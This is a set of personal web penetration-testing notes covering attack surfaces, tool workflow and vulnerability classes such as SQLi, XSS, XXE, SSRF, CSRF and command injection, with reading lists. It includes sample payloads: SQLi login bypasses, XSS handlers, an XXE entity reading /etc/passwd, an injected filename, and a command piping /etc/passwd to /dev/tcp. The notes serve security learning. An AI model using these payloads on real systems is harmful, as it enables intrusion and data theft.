It's confusing that tools and attacks and exploits often don't make the required context clear. Does a tool / attack / exploit operate:
  • Across the public internet to the target ?
  • Only from another machine in same LAN as the target ?

  • From a logged-out state ?
  • From a logged-in state ?
  • Require fooling a legitimate user into doing something ?

  • Require that you've obtained source code from the server ?

  • Require that you've managed to get shell access to the target ?
  • Require that you have a root shell on the target ?


Some apps, tools, attacks, or exploits may require that you have specific resources:
  • A public domain and web site that you control.
  • A static IP address, and an incoming port open to your machine.
  • A burner email address.
  • A burner phone number.
    To receive SMS:
  • A burner credit-card.
  • Money (real or fake) to order products.
  • If you spend your real money to get behind a paywall or buy a subcription, you may get into an area that has a lot fewer bug-bounty hunters in it, or may be considered lower-risk by the developers.
  • An address to ship to.
  • Accounts on Shodan and other online-database-type sites.

Attack Surfaces

  • The web app (pages shown to user).
  • The mobile app (app on smartphone).
  • Any other app UI (voice call to phone-menu, SMS interface, etc).
  • The browser and add-ons in it.
  • APIs (exposed by any server your code can talk to).
  • Libraries (that are exposed to your code).
  • Servers (that run web app, database, API, authentication, CMS, etc).
  • Containers or Operating Systems (that are exposed to your code).
  • Repositories that may contain credentials or source code or comments.

Attack Targets/Patterns

+/- It's confusing, because: For example, SQLi:
  • SQLi to read entire table of database back in a page right away. Or,
  • SQLi to put malicious script into database, user gets page with script, script does Request Forgery to Web/App Server. Or,
  • Code Injection to disable parameter-checking in pages in Web/App Server, SQLi on page to get data out of database.

What you'll do

Probably you'll:
  1. Start ZAP and Firefox, and browse the application manually for a while.
  2. Use the results recorded in ZAP to tweak ZAP, telling it about such things as session token names and login credentials.
  3. Run scans and attacks in ZAP and see what it reports.
  4. Explore any vulns, through ZAP and manually in the browser.
  5. Start Metasploit and try to exploit vulns.
  6. Run appropriate specific tools, such as sqlmap, WPScan, CMSmap, etc.
  7. Write reports on anything you've found, double-checking manually in a clean setup.
  8. Try to broaden or chain any vulns and exploits.
  9. Learn more about the application.
  10. Review project checklist, see if you've checked everything.
  11. Iterate as needed.

Aakash Choudhary's "Bug-Hunting-Mentality"
ZeroSec's "LTR101: WebAppTesting - Methods to the Madness"
Marcin Szydlowski's "Inter-application vulnerabilities and HTTP header issues. My summary of 2018 in Bug Bounty programs."
bitvijays's "CTF Series : Vulnerable Machines" (lots of techniques)
OWASP's "Category:Attack"
OWASP Testing Guide v4 Table of Contents
Prasanthi Eati's "10 Most Common Web Security Vulnerabilities"
Gwendal Le Coguic's "Vulnerabilities list"

Detectify's "OWASP Top 10 Vulnerabilities Explained"
David Schutzs "OWASP Top 10 Like I'm Five - BSidesBud2019"

You can look at OWASP Top 10 for most common types of vulnerabilities. But look back into the previous years of this list, for some items that have been pushed off the list but still are worth testing.

Sakurity Network's "Why OWASP Top 10 is no longer relevant" (4/2017)

Attacks And Vulnerabilities

Unsafe Input Handling

Code Injection

Mixing data and code.
Submit data that gets executed as code in the context of the application.
Wikipedia's "Code injection"

From Hacktrophy's "Description of basic vulnerabilities":
Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing.

Submit a script into a Comment field or theme, it gets stored in the database ("stored cross-site scripting"), and later other users can view your "comment" or use your theme. If you can't get a whole script tag in, maybe you can add an attribute such as onFocus or onLoad or onMouseOver to an existing tag.


<img src='nosuchfile' onerror='alert(123);' />
<a onmouseover='alert(234);'>alert here</a>
HTML5 Security Cheatsheet

HTML Injection: Submit HTML into a Comment field or theme, it gets stored in the database, and later other users can view your "comment" or use your theme, and get fooled by your HTML.
Hacking Articles' "Beginner Guide to HTML Injection"
Ziyahan Albeniz's "Frame Injection Attacks"

CRLF Injection:
Submit a parameter or request that has an encoded CRLF in the middle of it. Could be useful:
  • To inject new directives into the HTTP request header. Or,
  • Where one layer of the protocol or app treats it as one line and another layer treats it as two lines.
Offensive Security by Automation's "Automating CRLF"

Null Byte Injection:
Submit a parameter or request that has an encoded 0 byte (\x00, %00) in the middle of it. Could be useful if the page is taking the parameter and appending more characters (such as ".jpeg") to it. The null byte may cause the additional characters to be ignored.

Most browsers will strip "%00" from URLs, but Burp will let you put them in.

Encoding Sniffing:
Encode characters in some unusual way that the sanitizing code or encoder won't catch, but the browser will interpret in useful ways.

For example, if the page encoding is not specified, older browsers (such as IE8 and earlier) will accept UTF-7 such as:
which will survive sanitizing and URL-encoding, but the browser interprets as:

Mark Baggett's "Come to the Dark Side - Python's Sinister Secrets" (PDF slideshow)

File Upload

If the app has a function that lets a user upload a file to the server, give it filenames that contain "../", or match the name of an existing file (web page or included file) on the server. Give it a valid filename but a dangerous extension (.html, .js, .php, etc).

Or send an HTML file, with name and extension set to something allowed (such as jpeg), but MIME type set to "text/html". If the MIME type gets stored in the database and comes back to the browser later, the browser may use it. [Some older browsers such as IE 6 or 7 may interpret the file as HTML even if the MIME type is set to "image/jpeg", if they see enough HTML inside it. This is called "MIME sniffing".]

Send an XML file. Perhaps field values are not validated properly, and you can put HTML or JavaScript somewhere where it will be displayed/executed later.
OWASP's "Testing for XML Injection (OTG-INPVAL-008)"
Some other file types actually are XML inside, or can contain XML. Such as: .docx, .xlsx, .pptx, .wsdl, .gpx (GPS stuff), .xspf (playlist), .dae (digital asset exchange), many others.

From tweet by Luke Stephens (hakluke):
MS Office file formats are just zip files filled with XML files (and some other stuff).

If you ever come across an application that parses or displays any MS Word files, try unzipping it, adding an XXE payload to one of the XML files, zipping it back up, and uploading it.

Some image files (PNG) can contain "chunks" that are text or general data. Maybe HTML or scripting can be put into those chunks, or into EXIF ?
PNG (Portable Network Graphics) Specification, Version 1.2 - 4. Chunk Specifications
idontplaydarts' "Encoding Web Shells in PNG IDAT chunks"

Send an archive file (tar, zip, etc) that has filenames inside that have "../" in them ?

Suppose the file is immediately moved somewhere else, using an OS command such as mv or cp ? Give a filename such as "name.jpg;ls;" and see if anything happens.

Sites often use Content Delivery Networks (CDNs), putting user-supplied content on a different domain, to avoid some of these problems. The HTML or code in the file would be "executed" in the domain of the file, not the domain of the page, so would not have access to cookies etc.

Hacking Articles' "5 ways to File upload vulnerability Exploitation"
Hacking Articles' "Web Shells Penetration Testing (Beginner Guide)"
Jean Fleury's "Cross-Site Scripting and File Uploads"
int0x33's "Upload .htaccess as image to bypass filters"
Brute's "File Upload XSS"
OWASP's "Unrestricted File Upload"
Mathias Karlsson and Frans Rosen's "The lesser known pitfalls of allowing file uploads on your website"

outflanknl / EvilClippy (create malicious MS Office documents)
carnal0wnage / malicious_file_maker
chinarulezzz / pixload
Virendra Chandak's "How to create a zip file using PHP"
OWASP's "Test Upload of Malicious Files (OTG-BUSLOGIC-009)"

Script Injection

Give Web/App server a request with scripting in parameters or form fields, and get it to return a page containing that scripting.

This is "reflected scripting", and not really valuable in that it's running with your creds and in your browser. But it reveals that the pages or Web/App Server are handling input unsafely.

If you can't get a whole script tag in, maybe you can add an attribute such as onFocus or onLoad or onMouseOver to an existing tag.
Attacker --req with script in params or fields--> Web/App Server
Attacker <--page with script active-- Web/App Server

SQL Injection (SQLi)

QA engineer walks into a bar 2
Give Web/App server a request with SQL or SQL fragments in parameters or form fields, and see if it sends your SQL to the database.


' OR 1=1 --
' OR 1='1
SLEEP(10) /*' or SLEEP(10) or '“ or SLEEP(10) or “*/
1' or '1'='1
For username field of a login page:

admin' --
admin' #
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
Three phases:
"balance" is where you end the apps SQL gracefully,
"inject" is where you write your own SQL,
"comment" is where you comment out any trailing SQL so it doesn't throw an error.

"Inject" could be a complete new SQL statement, or could be a clause added to the existing statement with UNION or something.

In SQL, a UNION appends output rows from another SELECT to the output rows of the first SELECT. The two SELECTs have to produce the same number and types of columns.

Some forms of SQLi:
  • Reflected (AKA first-order SQLi).

    User input from HTTP request is incorporated into SQL operation to database server, and results come back in the page from the app server. It is non-persistent.
    Attacker --req with malicious SQL--> Web/App Server --malicious SQL--> Database Server
    Attacker <--page with secret data-- Web/App Server <--secret data-- Database Server

  • Stored (AKA second-order SQLi, or persistent SQLi).

    Attacker's code is stored in server and used when other users request pages.. This is persistent. Common in applications where users can communicate with each other, or admins review user-generated content.

The SQL sent to the database could:
  • Return secret data (e.g. passwords) to the Attacker.
  • Store malicious script into the database ("stored scripting"), which can later be served in pages to legitimate users.
  • Delete or destroy or encrypt (ransomware) the database.
  • Maybe weaken security settings on the database.
  • Maybe run OS commands on the database server machine.

"Blind" SQLi is when you can't directly see the result of the SQL operation.

Look for anywhere that the user or client page is specifying SQL terms directly, such as ASC or DESC or a column number for the ORDER BY clause.

It's very helpful to know what type of database server is present; SQL for them varies.

Paraphrased from Zenodermus Javanicus's "Basic of SQL for SQL Injection part 2":
If the input value is enclosed with single quotes in the SQL stmt, a single quote as input will give error.
If the input value is enclosed with double quotes in the SQL stmt, a double quote as input will give error.
If the input value is not enclosed with anything in the SQL stmt, both a single quote or a double quote as input will give error.

Different database server types give different error msg formats; see the article for details.

If you're getting visibility of only a single value, use SQL like:

-- return values starting from row 0, return only 1 row's data
Select Username from users limit 0,1;

If you're getting visibility of only a single row, use SQL like:

-- return values starting from row 0, return only 1 row's data
Select * from users limit 0,1;

SQL Fiddle
Jayson Grace's "SQL Cheatsheet"

Guru99's "SQL Injection Tutorial: Learn with Example"
SQL Injection articles in Hacking Articles' "Web Penetration Testing"
See Chapter 9 "Attacking Data Stores" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.
Series of 5 articles starting with DRD_'s "Database & SQL Basics Every Hacker Needs to Know"
DRD_'s "Attack Web Applications with Burp Suite & SQL Injection"
Allen Freeman's "The Essential Newbie's Guide to SQL Injections and Manipulating Data in a MySQL Database"
DRD_'s "Use SQL Injection to Run OS Commands & Get a Shell"
Wikipedia's "SQL injection"
Security Idiots' "Posts Related to Web-Pentest-SQL-Injection"
Uses different terminology: ninja hatori's "Example of a Error-Based SQL Injection"

Portswigger's "SQL injection cheat sheet" (probably requires login)
EdOverflow / bugbounty-cheatsheet /
netsparker's "SQL Injection Cheat Sheet"
trietptm / SQL-Injection-Payloads
Polyglot injection strings.
Maybe most likely on pages that are sorting data or showing tables of data.
pentestmonkey's "SQL Injection" cheat sheets
Reiner's "SQLi filter evasion cheat sheet (MySQL)"
Rails SQL Injection"

See SQL tools.

XKCD about little Bobby Tables

Server-Side Template Injection (SSTI)

For sites using a server-side template engine such as Flask, Jinja2, Mako, Jade, Ruby, Slim, Velocity, Smarty. Usual telltale is construct like "{{title}}" in the URL or HTML.

Give Web/App Server a request with template code in parameters or form fields, and see if the Template Engine executes the code.
Attacker --req with malicious template code in param--> Web/App Server + Template Engine
Attacker   <--page with template code executed-- Web/App Server + Template Engine

This is "reflected templating", and it's running with your creds. But it reveals that the pages or Web/App Server or Template Engine are handling input unsafely.

Maybe this can be used to get the Template Engine to run code you give it. Depending on how and where the Template Engine is running, this could give access to files or commands on the Web/App Server or Template Engine Server, or enable requests to other servers. If you can modify files on the servers, maybe you can modify pages that are served to other users.

From James Kettle's "Server-Side Template Injection":
"The 'Server-Side' qualifier is used to distinguish this from vulnerabilities in client-side templating libraries such as those provided by jQuery and KnockoutJS."

Sven Morgenroth's "Server-Side Template Injection Introduction & Example"
EdOverflow / bugbounty-cheatsheet / Template Injection

Client-Side Template Injection (CSTI)

For sites using a client-side template engine/library such as AngularJS, Angular, React, or Vue. Usual telltale is construct like "{{title}}" in the URL or HTML.

The attack could be:
  • Persistent (stored): attacker's data is stored in server and served to users in pages.
  • Non-persistent (reflected): attacker's data is on a link that user somehow clicks on or is redirected to.
Then the attacker's code is running in the user's browser, and could do a Request Forgery or Browser Exploitation or something.

tijme / angularjs-csti-scanner

Client-side HTTP Parameter Pollution (CSHPP)

Web/App Server expects an HTTP request with parameters, forms request to Back-End Server. But you give it a request with extra or duplicate or malformed parameters, so the request to Back-End Server is malicious.
Attacker --req with malicious params--> Web/App Server --malicious req--> Back-End Server
One place to do this is where you see an HTML tag with a "disabled" or "readonly" attribute in a form. That's a signal that the app assumes the parameter will be submitted unchanged, or not submitted at all, to the server.

Another case is where code/tag has been commented out. Maybe there's extra functionality on the server that you can activate by un-commenting.

Server-side HTTP Parameter Pollution (SSHPP)

Back-End Server expects an HTTP request from Web/App Server. But you give it a malicious request directly from your browser with extra or duplicate or malformed parameters, and Back-End Server executes the request.
Attacker --req with malicious params--> Back-End Server

There are other kinds of "injections": LDAP, XPath (XML Path Language; query for XML data), IMAP, SMTP.

Insecure Direct Object Reference (IDOR)

Now being renamed to Broken Object Level Authorization (BOLA) ?
Sometimes called "forced browsing" ?

Parameters in URL or in POST are referencing objects, but the parameters can be changed to reference other objects.

From Hacktrophy's "Description of basic vulnerabilities":
IDORs occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.

Classic example is an URL like "domain/page?userid=1234&operation=buy". Change "1234" to another number, do purchase using that user's info.
Attacker --req with changed params--> Web/App Server
Aon's "Finding more IDORs - Tips and Tricks"
zseano's "Learning about Insecure Object Reference (IDOR)"
Hacking Articles' "Beginner Guide to Insecure Direct Object References (IDOR)"
InsiderPhD's "Why Your IDORs Get NA'd, Cookies Explained" (video)

Open Redirect

Web app page is redirecting the user to some other page, but you find a way to change the redirection so they go to your page. User may not notice that they're no longer in the trusted app.

From Hacktrophy's "Description of basic vulnerabilities":
... when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials or other sensitive data.

Several code types that do a redirect:
  • Parameter in URL or in POST is referencing some app URL to go to. For example, an url like "apppage.php&url=newpage.php". The server-side code in apppage.php will do the redirect.

    URL parameters likely to do a redirect:
    • url= (or anything with "url" in it)
    • uri= (ditto)
    • dest=
    • continue=
    • redirect=
    • window=
    • next=
    • goto=

  • Client page code that redirects:
    • HTML: <meta http-equiv="refresh" content="0; url=newpage.php">
    • JavaScript: document.location='newpage.php';
    • JavaScript: document.URL='newpage.php';
    • JavaScript: window.location.href='newpage.php';
    • JavaScript: window.location.href='newpage.php';
    • JavaScript: window.location.assign('newpage.php');
    • JavaScript: window.location.replace('newpage.php');
    • JavaScript: window.navigate('newpage.php');
    • JavaScript:'newpage.php');
    • JavaScript:'newpage.php');
    • Flask framework: redirect('newpage.php');

  • URL trickery:

Try changing protocol in the redirect, from HTTPS to HTTP, or HTTP to FTP.

But how do you change a redirect in code supplied to some other user ? I guess you have to do a different exploit to do that.

If code checks that the redirected-to URL is valid, you have to fool that code somehow.

zseano's "Learning about Open Url Redirects"
OWASP's "Testing for Client Side URL Redirect (OTG-CLIENT-004)"
OWASP / CheatSheetSeries /

Unsafe API Input Handling

An API essentially is a complete additional attack surface, subject to many of the same vulnerabilities that a web app may have: SQLi, IDOR, etc.

XML External Entities (XXE)

("The 'S' in 'XML' stands for 'Security'.")

XML objects usually contain data, but they can contain items that fetch from a URL or cause execution of code.

(This is similar to Server-Side Request Forgery (SSRF) in that the object usually will be parsed and executed by the web/app server.)

Fetch can be done through defining a new "entity" inside the file, of form
<!ENTITY foo SYSTEM "file:///etc/passwd" >
so that a reference to "&foo;" then causes the file to be fetched. Also
<!ENTITY foo SYSTEM "" >

Also send XSLT that generates HTML.

Internal DTD Declaration: inside the XML, add DTD (maybe through a DOCTYPE line that references an external DTD file, or through ENTITY lines) that affects how the XML is parsed and maybe executed.

Some other file types actually are XML inside, or can contain XML. Such as: .docx, .xlsx, .pptx, .wsdl, .gpx (GPS stuff), .xspf (playlist), .dae (digital asset exchange), many others.

The attack could be:
  • Persistent (stored): attacker's XML or DTD is stored in server and served to users in pages.
  • Non-persistent (reflected): attacker's data is on a link that user somehow clicks on or is redirected to.
Attacker --XML with malicious content--> API Server
Attacker <--result with secret data-- API Server
This attack could be to an API server, or just a file upload to a file/web server. It's a form of code or script injection, I guess.
klose's "XXE Attacks - Part 1: XML Basics"
Portswigger's "XXE injection"
Robert Schwass's "XML External Entity - Beyond /etc/passwd (For Fun & Profit)"
EdOverflow / bugbounty-cheatsheet / XXE
EdOverflow / bugbounty-cheatsheet / XSLT Injection
OWASP's "Testing for XML Injection (OTG-INPVAL-008)"
phonexicum's "XXE"

Insecure Deserialization

Find where an app accepts a serialized object over RPC or out of database or something, and give it a modified or malicious object. The object could have a forged data state, or cause code execution.

Some client-side frameworks which communicate with app server using serialized objects: Flex, Silverlight, Java, Flash.

DSer plug-in to Burp Suite for viewing and manipulating serialized Java objects. Flash AMF support is built into Burp. WCF binary SOAP plug-in for Burp handles Silverlight WCF / NBFS.
Attacker --serialized object with malicious content--> API Server

Linus Sarud's "OWASP TOP 10: Insecure Deserialization"
Aditya Chaudhary's "Insecure Deserialization"
Vickie Li's "Deserialization Bugs in the Wild"

Insecure API

Many mobile and web-app APIs (RESTful APIs, SOAP, GraphQL, gRPC, more) involve sending a data or command object (encoded as XML, JSON, HTML, etc) over an HTTP connection. If user-supplied data can get into those objects, maybe something malicious can be done.

A RESTful API may also be called a "CRUD" API: Create / Read / Update / Delete.
Which often map to HTTP requests Post / Get / Put or Post / Delete or Post.
The response usually is JSON. (But "RESTful" covers a lot of variations: article.)

GraphQL may use URLs such as "gql?q=..." or "graphql?q=..." or "g?q=...".
The request is JSON, and the operation is specified inside the request, not on the URL ?
The response usually is JSON.

A web app function that sends email may feed user input into an SMTP connection. Try appending "" to the end of the From address. Try "Cc" instead of "Bcc", try "%0d%0a" instead of "%0a". In the body of the message, you may be able to end one message and start a second different message to a different address.

Look in web server's /.well-known directory, for any files that represent API capabilities. Also search the web for "targetname API" or "targetname developer docs" or look on GitHub or StackExchange.
ghostlulz's "Swagger API"
Niemand's "Exploiting Application-Level Profile Semantics (ALPS)"
Attacker --object with malicious content--> API Server
Attacker --req with malicious params--> Web/App Server --object with malicious content--> API Server

Ole Lensmar's "API Security Testing" (slideshow)
Asfiya Shaikh's "Web Services & API Pentesting - Part 1"
javatpoint's "Web Service Components"
Philippe De Ryck's "Common API security pitfalls" (video)
Philippe De Ryck's "Common API Security Pitfalls" (video)
Inon Shkedy's "Testing and Hacking APIs" (video)
Sharanbasu Panegav's "API Penetration Testing with OWASP 2017 Test Cases"
smodnix / 31-days-of-API-Security-Tips

Viacheslav Dontsov's "API testing: useful tools, Postman tutorial and hints"
Mike Yockey's "API Testing with Postman"
Rushyendra Reddy Induri's "Getting Started with Postman for API Security Testing: Part 1"
Mic Whitehorn-Gillam's "Better API Penetration Testing with Postman - Part 1"
James Messinger's "API testing tips from a Postman professional"
Download Postman

REST test test ...
Prakash Dhatti's "Penetration Testing RESTful Web Services"
OWASP / CheatSheetSeries /
Web Application Description Language (WADL)

Jean Fleury's "Web Services and SOAP Injections"
streaak/keyhacks (ways to test leaked API keys to see if they're valid)

ghostlulz's "API Hacking GraphQL"
swisskyrepo / GraphQLmap

If an app has multiple APIs, don't assume that they all implement the same security mechanisms. Test them as if they are separate applications.

Check to see if an app has multiple API servers running different versions of the same API.

Tweet from @Wesecureapp_RD:
7 out of every 10 applications we test are vulnerable to payment-related issues.
Tips for finding payment-related issues:
1 - Straightforward tampering the amount parameter before reaching the gateway.
2 - Tampering callback from failed to success.
Tweet from @nnwakelam:
I find for a lot of API's when you can prove the existence of a directory say /api/ you should try /v1/, /v2/, /v3/ (all different from a normal 404) and then baseline that against what a normal 404 looks like. Easy way to confirm path existence and keep bruteforcing.
Tweet from @_jensec:
If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json and it will fetch out json data without checking access control.


Used inside a web page to make asynchronous requests back to the web/app server. May send XML or JSON or HTTP. Uses XMLHttpRequest object in JavaScript.


Directory Traversal

If you can get access to the filesystem of a server, either via modification of a page, or via unexpected URLs or URL parameters, you can try many different filenames to see if they exist and can be read. And you can add prefixes to the filenames to go up and down in the directory tree.
Attacker --req for file X--> Web/App Server
Attacker <--contents of file X-- Web/App Server
Example prefixes:


DRD_'s "Perform Directory Traversal & Extract Sensitive Information"
DRD_'s "How to Find Directories in Websites Using DirBuster"
Look in the sitemap to get basic coverage.
Look in /robots.txt for stuff that's not supposed to be exposed.
BitTheByte / WayRobots
Look in for old pages that no longer appear in the UI, but may still be on the server, or may reveal something about the application.
Administration pages: admin, cpanel, adduser.

On-site Request Forgery (OSRF; AKA 'session riding')

Give a user a malicious page or frame from the application, while they're logged into the Web/App Server. Then the malicious code can do application operations using the user's credentials/authentication.

This is called "on-site" or "stored" RF; the malicious code is stored in the database.
Attacker --req with malicious script--> Web/App Server --SQL to store malicious script--> Database Server
User --request--> Web/App Server --SQL--> Database Server
User <--page with malicious script-- Web/App Server <--data containing malicious script-- Database Server
User --request by attacker's script--> Web/App Server
This is attacking the other users, not the underlying application, really. Your script will be executing with their credentials. Of course, if one of them is an admin user, then your script can do more.

Modified from "Penetration Testing" by Georgia Weidman:
"RF exploits a website's trust in the user's browser".

See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.

Cross-Site Request Forgery (CSRF or XSRF)

User is logged into the Web/App Server. Get them to open a page from Attacker's Server, and that page does application operations using their credentials/authentication.

From Hacktrophy's "Description of basic vulnerabilities":
CSRF is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf ...

This is "cross-site" because the malicious code running in another domain makes a request to the web-app in its domain.

But it's a bit different from reflected XSS in that here the operation is violating same-origin policy: it's coming from a different domain. Apparently SOP only prevents the response back to the browser, not the request. I guess it's up to the web-app to decide if the request is good or bad. The operation has to be accomplished in one request; there is no opportunity for req1-resp1-req2...

From Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto:
The same-origin policy does not prohibit one website from issuing requests to a different domain. It does, however, prevent the originating website from processing the responses to cross-domain requests.

Often this is prevented by using "anti-CSRF tokens", sending a random token from the app server and embedding it in any operation back to the app server. If an app doesn't do this, it may be broken. Relying only on a cookie is not good enough, because the browser will automatically provide that cookie with every request to the domain it is associated with, even if the request originates from another domain.

The anti-CSRF token would be embedded in a POST form back to the server, not a GET. If an app is changing state through GETs, probably something is wrong with the design.
User --request--> Attacker's Server
User <--page with malicious script-- Attacker's Server
User --request by attacker's script--> Web/App Server
This is attacking the other users, not the underlying application, really. Your script will be executing with their credentials. Of course, if one of them is an admin user, then your script can do more.

From "Penetration Testing" by Georgia Weidman:
"CSRF exploits a website's trust in the user's browser".

Sjoerd Langkemper's "Cross site request forgery (CSRF)"
DRD_'s "Manipulate User Credentials with a CSRF Attack"
See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.
CSRF articles in Hacking Articles' "Web Penetration Testing"
zseano's "Cross Site Request Forgery & bypassing protection"
Shahmeer Amir's "6 Methods to bypass CSRF protection on a web application"
Trust Foundry's "Cross-Site Request Forgery Cheat Sheet"
debasishm89 / burpy runs on Burp log file, it reports places where CSRF bypass (avoid defenses) might be viable.

Common critical functions to try CSRF:
  • Add/upload file.
  • Email change.
  • Delete file.
  • Password change.
  • Transfer money.
  • Profile edit.

Look for /crossdomain.xml and /clientaccess-policy.xml files.

To test an application's handling of cross-domain requests using XMLHttpRequest, try adding an Origin header specifying a different domain, and examine any Access-Control headers that are returned.

Server-Side Request Forgery (SSRF)

Usually shown as something like "redirect.php?url=", where the URL comes from the user or the client page somehow, or you can modify it.

Browser requests to Web/App Server, which normally turns around and requests to Back-End Server. Try to modify parameters so Web/App Server requests to some other server, not the Back-End Server. Or submit a "file:///etc/passwd" or "http://localhost/something" "" or "telnet://databaseserver" or "http://databaseserver:23/" URL.

This vuln usually shows up where one system talks to another, with some degree of user input or control.

A vuln involving a Post request might be more powerful than a vuln with a Get request, since Post usually is used to write data.
Attacker --req with malicious params--> Web/App Server --malicious req--> File Server

Detectify's "What is server side request forgery (SSRF)?"
EdOverflow / bugbounty-cheatsheet /
Wallarm / SSRF bible
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1"
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-2"
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-3"
Shorebreak Security's "SSRF's up! Real World Server-Side Request Forgery (SSRF)"

Command Injection

When there is some way for pages to cause the Web/App Server to execute OS commands on its OS, there may be a fault that allows unexpected commands to be run. Any place where a parameter from the user is being used in an OS command gives the chance to terminate that command and add a second command, or add a second argument to the original command.

In PHP, the command primitive isexec(). In ASP, In Perl, any command between a set of back-ticks (`).

If a parameter is being passed into a command string, try pipe symbol (|) or double-pipe (||) or ampersand (&) or semi-colon (; or %3b), followed by a command you want to run.

If you can't see the results of a command, try injecting a time-delay. Such as command "ping -c 2 -i 30 -n" to delay 30 seconds. Or use a command to create a file which you then can browse to, such as "ls > /var/www/html/foo.txt" or "dir > c:\inetpub\wwwroot\foo.txt" (you have to figure out the OS type and mapping from web root to OS directory). Or use a network command such as TFTP or netcat to contact attacker's server. Even "cat" can be used for this, as in "cat /etc/passwd >/dev/tcp/" ?
Attacker --req to run "cat /etc/passwd"--> Web/App Server
Attacker <--contents of /etc/passwd-- Web/App Server

DRD_'s "Use Command Injection to Pop a Reverse Shell on a Web Server"
Raj Chandel's "Comprehensive Guide on OS Command Injection"
Carrie Roberts' "OS Command Injection; The Pain, The Gain"
OWASP's "Testing for Command Injection (OTG-INPVAL-013)"
EdOverflow / bugbounty-cheatsheet / RCE

Gaurav Kamathe's "9 things to do in your first 10 minutes on a Linux server"

If you can convince the user to copy/paste something harmless-looking from your web page onto their local shell/commandline, you can get them to run a command/script you choose: Brian Tracy's "Don't Copy Paste Into A Shell" and example.

Privilege Escalation

If you can get access to the OS level of a server, either via Command Injection from a page, or via Shell Access, maybe you can escalate access from normal user to more powerful user.

On Linux, some standard privilege-escalation paths are: su, sudo, sudoedit, visudo, pkexec, admin:// URI scheme (as in "xed admin:///etc/passwd"), "s" bit in file permissions, cron jobs, putting system in single-user mode (run level 1). Some non-standard or distro-specific or non-Linux commands: calife, op, super, kdesu, kdesudo, ktsuss, beesu, gksu, gksudo, pfexec, in GUI file-explorer or desktop right-click and select "Open as root". For editing specific files: vipw, vigr.

Arnav Tripathy's "Linux Privilege Escalation Basics"
SK's "How To Check If A Linux System Is Physical Or Virtual Machine"
Linux Privilege Escalation articles in Hacking Articles' "Penetration Testing"
TokyoNeon's "How to Perform Privilege Escalation, Part 1 (File Permissions Abuse)"
TokyoNeon's "How to Perform Privilege Escalation, Part 2 (Password Phishing)"
DRD_'s "Perform Local Privilege Escalation Using a Linux Kernel Exploit"
Barrow's "Use a Misconfigured SUID Bit to Escalate Privileges & Get Root"
OccupyTheWeb's "Finding Potential SUID/SGID Vulnerabilities on Linux & Unix Systems"
Bill Tsapalos's "Hack Metasploitable 2 Including Privilege Escalation"
Rashid Feroze's "A guide to Linux Privilege Escalation"
g0tmi1k's "Basic Linux Privilege Escalation"
itsKindred / jalesc (Bash script for locally enumerating a compromised Linux box)
Aidan Preston's "Linux Notes / Cheatsheet"
Once you have root privilege: int0x33's "Privilege Escalation (Linux) by Modifying Shadow File for the Easy Win"

Remote Code Execution (RCE)

The ultimate achievement, especially if it's with root privilege. A request across the internet causes execution of an OS command or other code on the target. The code could create, update or delete files, exfiltrate files or information, open a remote shell, attack other machines on the LAN, etc.

Really this is a form of Command Injection, coming from outside.

Combined / Other

Cross-Site Scripting (XSS)

A confusing mega-term that has grown over the years, and often in ways that don't match the name at all. Some forms of it are not "cross-site", and some forms don't involve scripting. And it mixes two steps: input and exploitation.

XSS basically is the ability to run your own JavaScript on someone else's page.

XSS is targeting an individual user, usually putting a malicious page or script in their browser.

From Portswigger's "Web Security Academy":
[XSS] is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data.

From Hacktrophy's "Description of basic vulnerabilities":
XSS attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any unprotected cookies, session tokens, or other sensitive information retained by your browser and used with that site.

Some forms of XSS:
  • Reflected (AKA rXSS or first-order XSS).

    Input to server is "reflected" back in the output from the server. It is non-persistent.

    ZAP has a module to look for this automatically. It will generate a request giving some unique value for a parameter, then look to see if that value is in the response page. And do this for all parameters and fields in all URLs and pages, I think. It analyzes how the value appears in the response, determining if it's in a tag attribute, tag text, free text, quoted, etc.

    Attacker --sends malicious link--> User    
        User --request from malicious link--> Web/App Server
        User <--page with malicious script-- Web/App Server

    Somehow attacker gets user to click a link to Web/App Server, but parameters make server return a page that does something malicious, maybe redirect user to some other site, or use user's creds to do web-app operations, or copy a session token or cookie and send it to attacker.


  • DOM-based.

    Malicious code is put in user's DOM, and interacts with a normal web-app page, maybe one that has already been fetched from the server. This is non-persistent.

    From Portswigger's "Web Security Academy":
    DOM-based XSS arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

    Attacker --sends malicious link--> User    
        User --normal page request--> Web/App Server
        User <--normal page-- Web/App Server

